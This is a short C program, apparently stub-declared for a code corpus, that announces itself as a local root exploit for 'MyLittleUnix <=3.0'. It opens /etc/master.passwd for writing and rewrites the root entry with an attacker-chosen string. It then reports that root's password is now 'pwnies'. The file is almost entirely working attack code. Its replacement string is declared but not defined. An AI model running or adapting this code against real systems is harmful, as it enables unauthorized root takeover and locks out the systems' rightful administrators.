
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int uint ;
struct stat {scalar_t__ st_size; } ;


 int O_RDWR ;
 int SEEK_SET ;
 int close (int) ;
 int exit (int ) ;
 int lseek (int,int ,int ) ;
 void* malloc (int) ;
 int open (char*,int ) ;
 int printf (char*) ;
 char* pwnystr ;
 int read (int,char*,scalar_t__) ;
 int stat (char*,struct stat*) ;
 int strlen (char*) ;
 scalar_t__ strstr (char*,char*) ;
 char* strtok (char*,char*) ;
 int write (int,char*,int ) ;

int main(){
 int fd, r;
 struct stat *fileinfo = malloc(sizeof(struct stat));
 char *buffer, *line, *filenm = "/etc/master.passwd";
 printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n");
 fd = open(filenm,O_RDWR);
 r = stat(filenm,fileinfo);
 buffer = malloc((uint)fileinfo->st_size);
 if(buffer){
  read(fd,buffer,fileinfo->st_size);
 }
 else{
  printf("[!] No pwn for you pwnie\n");
  exit(0);
 }
 lseek(fd,0,SEEK_SET);
 line = strtok(buffer,"\n");
 while(line){
  if(strstr(line,"root:")){
   write(fd,pwnystr,strlen(pwnystr));
  }
  else{
   write(fd,line,strlen(line));
   write(fd,"\n",strlen("\n"));
  }
  line = strtok(((void*)0),"\n");
 }
 close(fd);
 printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n");
 exit(0);
}
